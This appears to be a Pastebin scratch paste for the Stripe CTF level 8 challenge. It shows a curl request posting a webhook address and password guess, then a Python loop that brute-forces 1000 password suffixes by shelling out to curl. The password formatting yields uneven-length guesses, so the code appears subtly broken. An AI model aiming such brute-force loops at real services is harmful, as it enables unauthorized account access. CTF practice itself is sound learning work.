Advertisement
Guest User

Untitled

a guest
Aug 28th, 2012
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.54 KB | None | 0 0
  1. curl 'https://level08-4.stripe-ctf.com/user-stsqneospz/' -d '{"webhooks":["level
  2. 02-3.stripe-ctf.com:8010"],"password":"1657740000"}'
  3. curl: (1) Protocol 'https not supported or disabled in libcurl
  4.  
  5. import os
  6. url="https://level08-4.stripe-ctf.com/user-stsqneospz/"
  7. webhook='level02-3.stripe-ctf.com:8010'
  8. for passsection in xrange(0,1000):
  9. password='165774000%s'%str(passsection)
  10. data='{"webhooks":["%s"],"password":"%s"}'%(webhook,password);
  11. command="curl '%s' -d '%s'"%(url,data);
  12. print command
  13. res=os.system(command);
  14. print res;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement